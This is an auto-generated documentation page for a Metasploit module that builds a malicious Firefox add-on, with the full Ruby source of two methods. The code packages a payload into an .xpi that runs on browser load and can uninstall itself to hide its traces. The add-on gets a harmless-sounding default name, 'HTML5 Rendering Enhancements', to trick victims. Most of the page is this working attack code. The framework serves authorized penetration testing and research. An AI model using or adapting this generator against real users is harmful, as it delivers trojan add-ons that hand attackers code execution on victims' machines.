adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/FirefoxAddonGenerator.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

481 lines
22 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::FirefoxAddonGenerator
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::FirefoxAddonGenerator";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (F)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">FirefoxAddonGenerator</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::FirefoxAddonGenerator
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="FirefoxPrivilegeEscalation.html" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation (module)">FirefoxPrivilegeEscalation</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/firefox_addon_generator.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#generate_addon_xpi-instance_method" title="#generate_addon_xpi (instance method)">#<strong>generate_addon_xpi</strong>(cli) &#x21d2; Rex::Zip::Archive </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>application/x-xpinstall MIME type.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Add in the supported datastore options.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="FirefoxPrivilegeEscalation.html" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation (module)">FirefoxPrivilegeEscalation</a></span></h3>
<p class="inherited"><span class='object_link'><a href="FirefoxPrivilegeEscalation.html#exec_shellcode_source-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#exec_shellcode_source (method)">#exec_shellcode_source</a></span>, <span class='object_link'><a href="FirefoxPrivilegeEscalation.html#js_exec-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#js_exec (method)">#js_exec</a></span>, <span class='object_link'><a href="FirefoxPrivilegeEscalation.html#js_target%3F-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#js_target? (method)">#js_target?</a></span>, <span class='object_link'><a href="FirefoxPrivilegeEscalation.html#run_payload-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#run_payload (method)">#run_payload</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JSObfu.html#js_obfuscate-instance_method" title="Msf::Exploit::JSObfu#js_obfuscate (method)">#js_obfuscate</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="generate_addon_xpi-instance_method">
#<strong>generate_addon_xpi</strong>(cli) &#x21d2; <tt>Rex::Zip::Archive</tt>
</h3><div class="docstring">
<div class="discussion">
<p>application/x-xpinstall MIME type</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Rex::Zip::Archive</tt>)</span>
&mdash;
<div class='inline'>
<p>containing a .xpi, ready to be served with the</p>
</div>
</li>
<li>
<span class='type'></span>
<div class='inline'>
<p>nil if payload fails to generate</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_addon_generator.rb', line 51</span>
<span class='kw'>def</span> <span class='id identifier rubyid_generate_addon_xpi'>generate_addon_xpi</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Zip</span><span class='op'>::</span><span class='const'>Archive</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_xpi_guid'>xpi_guid</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_guid'>rand_guid</span>
<span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='id identifier rubyid_regenerate_payload'>regenerate_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>function startup(data, reason) {</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_run_payload'>run_payload</span>
<span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>AutoUninstall</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>var xpi_guid = &quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;</span><span class='tstring_end'>|</span></span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>%q|</span><span class='tstring_content'>
function uninstallMe() {
try { // Fx &lt; 4.0
Components.classes[&quot;@mozilla.org/extensions/manager;1&quot;]
.getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import(&quot;resource://gre/modules/AddonManager.jsm&quot;);
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
}
uninstallMe();
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>bootstrap.js</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>chrome.manifest</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>content\t</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>/content/overlay.xul\n</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>install.rdf</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;RDF xmlns=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot; xmlns:em=&quot;http://www.mozilla.org/2004/em-rdf#&quot;&gt;
&lt;Description about=&quot;urn:mozilla:install-manifest&quot;&gt;
&lt;em:id&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/em:id&gt;
&lt;em:name&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ADDONNAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/em:name&gt;
&lt;em:version&gt;1.0&lt;/em:version&gt;
&lt;em:bootstrap&gt;true&lt;/em:bootstrap&gt;
&lt;em:unpack&gt;true&lt;/em:unpack&gt;
&lt;em:targetApplication&gt;
&lt;Description&gt;
&lt;em:id&gt;toolkit@mozilla.org&lt;/em:id&gt;
&lt;em:minVersion&gt;1.0&lt;/em:minVersion&gt;
&lt;em:maxVersion&gt;*&lt;/em:maxVersion&gt;
&lt;/Description&gt;
&lt;/em:targetApplication&gt;
&lt;em:targetApplication&gt;
&lt;Description&gt;
&lt;em:id&gt;{ec8030f7-c20a-464f-9b0e-13a3a9e97384}&lt;/em:id&gt;
&lt;em:minVersion&gt;1.0&lt;/em:minVersion&gt;
&lt;em:maxVersion&gt;*&lt;/em:maxVersion&gt;
&lt;/Description&gt;
&lt;/em:targetApplication&gt;
&lt;/Description&gt;
&lt;/RDF&gt;</span><span class='tstring_end'>|</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>overlay.xul</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>%q|</span><span class='tstring_content'>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;overlay xmlns=&quot;http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul&quot;&gt;
&lt;script src=&quot;bootstrap.js&quot;/&gt;
&lt;script&gt;&lt;![CDATA[window.addEventListener(&quot;load&quot;, function(e) { startup(); }, false);]]&gt;&lt;/script&gt;
&lt;/overlay&gt;</span><span class='tstring_end'>|</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Add in the supported datastore options</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_addon_generator.rb', line 17</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w{</span><span class='words_sep'> </span><span class='tstring_content'>java</span><span class='words_sep'> </span><span class='tstring_content'>linux</span><span class='words_sep'> </span><span class='tstring_content'>osx</span><span class='words_sep'> </span><span class='tstring_content'>solaris</span><span class='words_sep'> </span><span class='tstring_content'>win</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Payload</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BadChars</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DisableNops</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Targets</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span>
<span class='lbracket'>[</span>
<span class='lbracket'>[</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Universal (Javascript XPCOM Shell)</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>firefox</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'>ARCH_FIREFOX</span>
<span class='rbrace'>}</span>
<span class='rbracket'>]</span><span class='comma'>,</span>
<span class='lbracket'>[</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Native Payload</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w{</span><span class='words_sep'> </span><span class='tstring_content'>java</span><span class='words_sep'> </span><span class='tstring_content'>linux</span><span class='words_sep'> </span><span class='tstring_content'>osx</span><span class='words_sep'> </span><span class='tstring_content'>solaris</span><span class='words_sep'> </span><span class='tstring_content'>win</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'>ARCH_ALL</span>
<span class='rbrace'>}</span>
<span class='rbracket'>]</span>
<span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DefaultTarget</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>0</span>
<span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span><span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ADDONNAME</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The addon name.</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>HTML5 Rendering Enhancements</span><span class='tstring_end'>&quot;</span></span> <span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>AutoUninstall</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Automatically uninstall the addon after payload execution</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='kw'>true</span>
<span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:37 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink